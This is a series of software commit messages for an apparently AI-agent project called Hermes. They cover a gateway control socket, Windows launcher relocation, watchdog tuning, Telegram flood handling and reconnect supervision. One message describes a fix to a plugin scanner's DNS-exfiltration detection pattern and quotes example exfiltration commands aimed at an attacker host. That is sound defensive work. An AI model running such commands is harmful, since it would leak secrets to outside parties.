Real child process binding the real pipe via the proactor loop with the
default handlers; real sync client; real collect_fleet_versions consumer;
kill-and-fallback proof. Skipped everywhere except a real Windows host.
The gateway now creates a local control socket at startup (Unix domain
socket at $HERMES_HOME/gateway.sock with a pointer-file fallback for
long paths; named pipe on Windows) and answers versioned JSON verbs:
- identify: pid, profile, hermes_home, code_sha/code_version (#91283
stamps, now queryable live), self-declared supervisor kind, start_time
- status: the live runtime-status payload, answered by the process itself
Bound immediately after the PID-file O_EXCL claim (the moment the
process becomes the authoritative gateway for its HERMES_HOME), removed
on clean shutdown; a successor clears any stale socket on bind. Strictly
non-fatal: bind failure only means consumers use the old path.
Consumers migrated (observability only, scan layer demoted to fallback,
never deleted):
- collect_fleet_versions() (post-update fleet matrix): prefers a live
identify answer over gateway_state.json; entries carry source=socket
- collect_runtime_inventory() (hermes update --plan): prefers the
socket, and takes the gateway's own supervisor declaration instead of
inferring it from PID scans
Old gateways mid-upgrade, crashed processes, and bind failures behave
exactly as before. Never a TCP port; filesystem/pipe ACLs are the auth
boundary (0600 socket).
Part of #91277 (fleet-update reliability). Design: #92091.
The PR narrowed _is_fts_write_corruption_error to only match FTS5-specific
'fts5: corrupt structure record' errors, dropping the generic 'database disk
image is malformed' match. But FTS shadow table corruption (the common case)
raises the generic error on SQLite < 3.53, not the FTS5-specific one. This
broke FTS self-heal for 10 existing tests and for users on older SQLite.
Restore the generic match via is_malformed_db_error. Safety is preserved
because the FTS rebuild only touches derived indexes — if the damage is
actually in a canonical B-tree, the rebuild itself fails and the write
propagates.
Also restore the original test assertion and remove the
test_generic_malformed_write_fails_closed test whose premise (generic
corruption should not trigger FTS rebuild) was wrong for the FTS self-heal
path.
The dns_exfil pattern matched the 'host' DNS command inside flag names
like llama.cpp/vllm's --host 127.0.0.1 --port $PORT, so any plugin
shipping a .sh launcher script was blocked as dangerous. A negative
lookbehind (?<![-/]) excludes flag/path contexts while real DNS-lookup
exfiltration (host $SECRET.attacker.example, nslookup $X, dig $(...))
still trips the pattern.
Salvaged from PR #92382 (regex fix + regression test); scan-scoping
half rejected separately.
os.geteuid() does not exist on Windows, so collecting the module
crashed with AttributeError before any test ran. Branch on
hasattr(os, "geteuid") the same way the code under test does.
Every uninstall mode deletes the code checkout, but the launchers in
the managed binary dir (%LOCALAPPDATA%\hermes\bin) live outside it and
survived -- so `hermes` in a new terminal resolved to a launcher whose
venv target was gone and errored, which reads worse than
command-not-found.
remove_windows_bin_launchers deletes both launcher forms (.exe/.cmd)
from the managed binary dir in every uninstall mode, anchored on the
default Hermes root so profile sessions cannot redirect the sweep into
profiles\<name>\bin. When the uninstall itself runs through the
launcher, that exe is mandatory-locked against deletion but not rename
(the same fact _quarantine_running_hermes_exe relies on), so it falls
back to renaming the launcher aside.
The managed uv (uv*.exe) in the same dir survives, and the hermes\bin
PATH entry is swept only on a full wipe from the default root
(include_managed_bin) -- a keep-data uninstall keeps the still-working
uv resolvable for reinstalls.
A lockstep test parses install.ps1's staging loop so the swept names
cannot drift from the staged names silently.
The installer staged the hermes/hermes-acp launcher copies at
hermes-agent\bin -- inside the git working tree -- and put that dir on
the user PATH (#84452). The update command's pre-pull autostash
(git stash push --include-untracked) swept those untracked, unignored
copies off disk, and once the desktop updater stopped re-applying
stashes (--keep-stash, 5dd221d442) nothing restored them: `hermes`
stopped resolving in every new terminal on every desktop-updated
install.
Move the canonical launcher home to the managed binary dir
(%LOCALAPPDATA%\hermes\bin, next to the managed uv) -- outside the
checkout, where no git operation can ever touch it. The dir is
per-machine and shared by every profile, so all anchoring uses
get_default_hermes_root(), never HERMES_HOME (which points inside
profiles\<name> under `hermes -p`).
The copy design also had a second latent break: managed-uv rebuilds
create relocatable venvs, and a relocatable venv's exe trampoline
resolves relative to its own location -- a copy outside venv\Scripts
dies with 'uv trampoline failed to canonicalize script path'. Launcher
form now depends on the venv (lockstep in install.ps1 and
_install_repair.py): exe copy for normal venvs, a .cmd delegator
invoking the in-venv exe by absolute path for relocatable ones. Either
form counts as present, so pre-rebuild exe copies are left alone.
Delivery to the existing fleet, per cohort:
- already-broken installs cannot run the CLI, so an import-time heal in
hermes_cli.main (ensure_windows_bin_launchers) re-stages missing
launchers when the desktop app spawns its backend -- the one channel
that still reaches them. Gates fail toward inaction: canonical dir
only for the managed clone, legacy hermes-agent\bin only while the
user PATH still resolves through it (some pre-managed-uv installs
have no hermes\bin PATH entry; the legacy re-stage is what fixes
those). Staging-name + os.replace keeps concurrent process starts
from tearing a launcher; the helper never raises.
- healthy old-layout installs migrate in the update tail
(migrate_windows_bin_path): stage canonical launchers, verify them
BEFORE touching the registry, prepend hermes\bin to the user PATH,
strip the legacy entries (hermes-agent\bin and venv\Scripts, #83797),
preserving REG_EXPAND_SZ and raw %VARS%. The legacy dir's files stay
on purpose -- configs holding absolute launcher paths keep working;
only the sweepable PATH resolution route goes.
- fresh installs get the new layout from install.ps1 directly.
/bin/ is gitignored so the one update that DELIVERS this fix cannot
sweep pre-migration launchers a final time under the old rules; the
gitignore line, the legacy re-stage branch, and the update-tail call
are transition machinery with a named expiry once the fleet has
migrated.
Also rewrites _ensure_acp_launcher's stale Windows paragraph to match
(raw docstring fixes its invalid \S escape) and updates the Windows
native docs to the new layout, with a docs<->installer parity test.
Follow-up to the cherry-picked cleanup: the default.tar.gz profile export
was also carried into published container images by the Dockerfile's
'COPY . .' layer because .dockerignore had no matching pattern. Anchor
the .gitignore rules to repo root (per review feedback on #91712) and
add the same set + /*.tar.gz to .dockerignore so root archives can never
reach an image layer again.
These were committed to the repo root but are build/debug byproducts:
- log.txt: empty 0-byte file
- sqlite_leak_fix.png: unreferenced 832KB image
- default.tar.gz: 1.96MB, only used as a test fixture OUTPUT (tests write it
to a temp dir, never read from repo root)
Add ignore rules so they cannot be re-committed. Part of audit cleanup
(HA-D11-001 / HA-D3-001).
Two follow-up layers on top of the salvaged runtime-boundary guard (#87871):
- coalesceToolOnlyAssistants now folds via concatToolPartsUnique, dropping an
incoming tool-call part whose toolCallId the predecessor already carries.
Two individually-clean rows sharing an id (structural carry-over re-attaching
a cached row's calls) no longer become one crashing message — and no longer
render the same call twice. Root-cause analysis by @marketing2981 (#87857).
- loadTranscriptTail repairs a poisoned persisted tail on read; installs
already carrying a duplicate in hermes.transcript-tail.v1:* stop
crash-looping after upgrade instead of re-deriving the same collision
every launch.
- Regression tests for all three layers, incl. the end-to-end repository link
test (from #92093 by @RasputinKaiser) and the cross-message ids-stay-
untouched contract (per-response tool numbering, e.g. Kimi — #90545 by
@M7MMAD-OMAR). Each test sabotage-verified against its reverted layer.
A message whose content carries two tool-call parts with the same
toolCallId makes assistant-ui's useResources throw
"Duplicate key toolCallId-<id> in useResources", which the workspace
error boundary turns into a renderer crash loop that blanks the window.
The existing withUniqueToolCallIds dedup runs only on the static
toChatMessages output; the streaming reducer (which can append the same
tool-call part twice under an optimistic-update ordering) and tool-only
assistant coalescing both reach the runtime without passing through it.
Add withUniqueToolCallIdsWithinMessage and apply it in
useRuntimeMessageRepository, the single ChatMessage->ThreadMessage
boundary shared by the static and streaming paths, right where the
repeated-message.id guard already lives. The dedup is per-message (the
assistant-ui key space is per-message) and returns the same reference
when clean, so the repository's identity cache is untouched in the
common no-duplicate case.
Addresses both review findings from @egilewski on #89134:
- Non-finite values: _coerce_int now degrades int(inf) (OverflowError
previously ABORTED gateway config loading); the clamp requires
math.isfinite plus sane upper bounds (interval <=3600s, timeout
<=600s, strikes <=1000), falling back to the shutdown_watchdog
constants.
- Loader wiring: load_gateway_config builds gw_data FLAT and never
forwarded the yaml gateway: section, so loop_watchdog* keys —
including the PRE-EXISTING loop_watchdog bool documented in
config_defaults — were silently ignored on the real startup path.
Bridged with the established top-level-wins/nested-fallback pattern.
E2E: config.yaml with loop_watchdog:false + strikes:12 + interval:.inf
now yields False/12/30.0 through the real loader.
Downscope of the salvaged #89134 per review: the 3->8 default raise was
symptom tolerance for the false-positive class the off-loop heartbeat +
two-witness probe fixes at the root — fleet-wide it would only delay
genuine-wedge recovery ~2.7x. The three tuning knobs keep independent
operator value and stay:
- default max_strikes back to 3 everywhere (constant, dataclass,
from_dict fallback, floor clamp, tests)
- gateway/config.py + gateway/run.py now reference the
shutdown_watchdog DEFAULT_* constants instead of duplicating literals
in three places (drift hazard)
- knobs registered in hermes_cli/config_defaults.py alongside the
sibling gateway.loop_watchdog bool
The event-loop liveness watchdog (gateway.shutdown_watchdog) hard-exited with
code 75 after 3 consecutive missed probes (probe_interval=30s, timeout=10s,
max_strikes=3), i.e. ~90-120s of loop block. Telegram/Discord reconnect during
a network blip does synchronous socket I/O on the loop and can block it for
60-90s; these stalls self-recover (recurring fleet incidents on 2026-08-17
stalled cron dispatch ~21h via restart churn, kanban t_0f76430f).
Raise the default max_strikes 3->8 so a transient reconnect stall is tolerated
while a genuine multi-minute wedge still escalates, and expose the three
tolerance knobs via config.yaml (gateway.loop_watchdog_probe_interval_s /
_probe_timeout_s / _max_strikes) so operators can tune per deployment.
Refs: kanban t_70483f23
hermes_cli/gateway.py's restart-wait sizing (from #92175) was the only
cross-module import of an underscore-private shutdown_forensics helper.
Promote it (private alias retained for existing patchers).
Extract _FLOOD_INLINE_WAIT_CAP_SECS + _flood_cap_result so the 5s cap
and the flood_control:{wait} error contract cannot drift between the
edit path and the send path #92173 added.
The notifier watcher offloads the same class of guarded Kanban writers
(_kanban_advance/_kanban_rewind/_kanban_unsub) as the dispatcher ticks
that #92172 wrapped. Apply the same offload-boundary scrub to all 10
writer sites for uniform defense-in-depth (read-only _collect stays on
bare to_thread), and reword the helper docstrings to state the
defense-in-depth relationship to spawn isolation accurately.
Post-merge follow-up to #92173. The claim + resume-clear lived inside
the boot-send task AFTER the restart notification — itself a
flood-controllable send. If that notification outlived the restore-gate
timeout, the gate opened with zero rows claimed and the resume
scheduler replayed turns whose answers were already in the ledger,
while the background task later redelivered them too (duplicate
delivery + re-paid turn).
Split _redeliver_pending_obligations into _claim_pending_obligations
(pure DB: sweep + resume clear, awaited inline before the send task
exists) and _redeliver_claimed_obligations (network half, stays inside
the bounded task). The original name remains as a composition wrapper.
Mutation-checked: both updated gate tests fail on pre-split run.py.
Final-review follow-up: swap the bare [:25] slice for the new constant.
Behavior-identical (same 25); removes the last bare option-cap literal
in the file. ChoicePickerView feeds finite /reasoning and /fast choice
lists, so no functional change.
Final-review follow-up: replace the bare 75 in the shown-count with
_DISCORD_MODEL_SELECT_CAPACITY so it can never desync from what the
partitioned menus actually render.
- Drop the 'aborted before its tail' no-op sentence: early aborts are
intercepted by the aborted/no-progress branches and never reach the
would-grow check, so the framing overstated its relevance (2c finding).
- Test now also asserts the durable model_config copy still holds the
armed runway after the refusal — locking in the memory==disk half of
the contract, not just the in-memory value.
compress()'s successful tail zeroes _proactive_prune_rearm_tokens in
memory — correct for a committed compaction, whose boundary already broke
the prompt-cache prefix. But compress_context's anti-growth guard can then
REFUSE the result and keep the original transcript, whose cached prefix is
intact. The refusal returned with the in-memory runway still at 0 while the
durable model_config copy kept the old value, so:
- the next eligible iteration's proactive prune fired without the regrowth
interval #79640 introduced — an immediate, unthrottled cache-breaking
rewrite (#91830's bug class), and
- memory and disk disagreed until a restart silently re-armed the throttle
from the stale durable row.
The refusal branch now restores the runway from the attempt snapshot — the
same targeted restore the rotation-failure rollback already performs.
Sibling non-commit branches audited: aborted (returns before the tail
zero), no-progress (tail zero only runs after a real boundary rewrite,
which no-progress by definition lacks), empty-transcript (built-in tail
never returns []), fence-denied (full snapshot restore already covers the
runway), in-place DB failure (in-memory transcript keeps the compacted
form, so the zeroed runway is consistent with it).
Fixes the reachable half of the structural asymmetry flagged in #91830.
Spawn-time Context isolation cannot rewrite an already-running watcher task. Run dispatcher SQLite offloads in an empty Context so write_txn no longer false-trips after delegate_task, while real child callers still hit the mutation guard.
Review of #90448 by @andrexibiza: adding _ensure_reconnect_watcher_running()
to the already-queued branch of a fatal callback is still an event-coupled
check. It needs a later fatal error from some other platform to arrive, and
#81036 makes that less likely rather than more -- it publishes the queue
before disconnect and drops the failed adapter from the live map, so after
the watcher's supervised restart budget is spent there may be no adapter
left to emit the event recovery is waiting on.
That is the state #72366 (salvage of #71867 by @ygd58) restored supervision
to close: queued work exists, the watcher is dead, and nobody owns the
invariant. Supervision being finite is correct; having no owner past the
budget is not.
_spawn_supervised now takes on_give_up, invoked when it abandons a task --
the supervisor is the only thing that knows it has. The reconnect watcher
uses it to hold:
while _running and _failed_platforms is non-empty, either a reconnect
watcher is live or a bounded respawn is scheduled.
Empty queue: leave it down and log; the enqueue path spawns a fresh watcher
the moment something depends on one. Non-empty: a bounded slow tier at
_RECONNECT_WATCHER_SLOW_RETRY_SECS (300s) for _MAX_SLOW_WATCHER_RESPAWNS (6)
attempts, standing down early if the queue drains or a watcher returns on
its own. Exhausted: one loud error naming the platforms left unattended.
The ceiling is (1 + _MAX_SUPERVISED_RESTARTS) x (1 + _MAX_SLOW_WATCHER_RESPAWNS)
spawns -- 42 across at least half an hour -- because each slow attempt hands
the watcher a fresh supervised budget. A test asserts that ceiling so it
cannot quietly become a restart loop.
Deliberately NOT included: requesting a process restart when the slow tier
is also exhausted. Taking down every healthy platform to heal a sick one is
a blast-radius policy decision for a maintainer.
Two things this turned up:
- _spawn_supervised did not thread on_give_up through its own backoff
respawn, so the callback was lost after the first restart and the give-up
branch had no owner at exactly the moment it needed one -- the same defect
the on_spawn docstring warns about, one parameter over.
- Three call sites repeated the (factory, name, on_spawn) triple, whose
on_spawn half is load-bearing. They now go through
_spawn_reconnect_watcher().
_supervised_backoff() names the previously-inline exponential schedule so
the exhaustion tests can collapse it; production behaviour is unchanged.
Refs #90386
_ensure_reconnect_watcher_running() exists for one situation: the reconnect
watcher has exhausted _MAX_SUPERVISED_RESTARTS, so _spawn_supervised has logged
"giving up restarts" and will never bring it back on its own (#70344, and the
supervised-restart half of #71758). It had exactly one call site, inside the
newly-queued branch of _queue_retryable_fatal_platform.
That branch is unreachable for a platform already in _failed_platforms, which
is the only kind of platform the watcher can have been retrying long enough to
burn five rapid restarts on. So the backstop could not fire in the one state it
was written for.
The failure is silent by construction. The early return logs nothing, so there
is no "queued for background reconnection" line. The stranded check in
_handle_adapter_fatal_error_detached deliberately treats a queued platform as
safe, so the gateway does not exit for the service manager either. With another
platform still connected, self.adapters is non-empty and the "gateway staying
alive, watcher will retry in background" branch is skipped too. A retryable
fatal error can therefore produce a single ERROR line and then nothing: the
platform sits in the queue that nobody is draining until someone restarts the
process by hand (#90386 reports 4h17m of that, with cron unaffected throughout).
Call the ensure on the already-queued path as well. It is already idempotent
and already cheap: it returns immediately unless the tracked task is done, and
it routes through the same on_spawn handle tracking, so a live watcher is never
duplicated.
The queue entry itself is deliberately left untouched. Re-enqueueing would
reset attempts and next_retry, restarting the backoff ladder on every fatal
error and hammering a provider that is already refusing the connection.
The eager session.resume path called _transfer_db_to_agent(agent, db)
unconditionally. With no non-launch profile selected, db resolves to the
SHARED launch handle (_get_db()), so the transfer succeeded on identity
alone — the agent IS holding that handle — and session.close() then
closed the process-wide database under every unrelated session:
subsequent writes failed with "'NoneType' object has no attribute
'execute'" and the Desktop could not open chats until restart (#91610).
This directly violated _transfer_db_to_agent's own contract ("Never
called for the shared launch handle", introduced with the ownership
lifecycle in #81071).
Gate the transfer on owns_db (dedicated handles only), and add defense
in depth: _transfer_db_to_agent now refuses db is _get_db() even when a
caller invokes it incorrectly.
Follow-up to the salvaged #91986: the per-row clear still left rows the
loop had not reached exposed — a slow send ahead of them could hold the
loop past the inbound-gate timeout and let
_schedule_resume_pending_sessions replay those turns. Clearing every
claimed row up front closes the duplicate window; claiming already
spent the redelivery attempt, so the ledger retry path is unchanged.
Restart notification and obligation redelivery ran before the
startup-restore gate opened, so one hung Telegram send queued inbound
on every platform. Bound those sends with the same timeout the resume
gate already uses, and clear resume_pending before send so a timed-out
redelivery cannot also replay the turn.
Telegram RetryAfter on send() slept the server retry_after with no
ceiling, so a 97-minute penalty pinned the coroutine. Mirror the edit
path: waits over 5s return immediately; short waits still retry inline.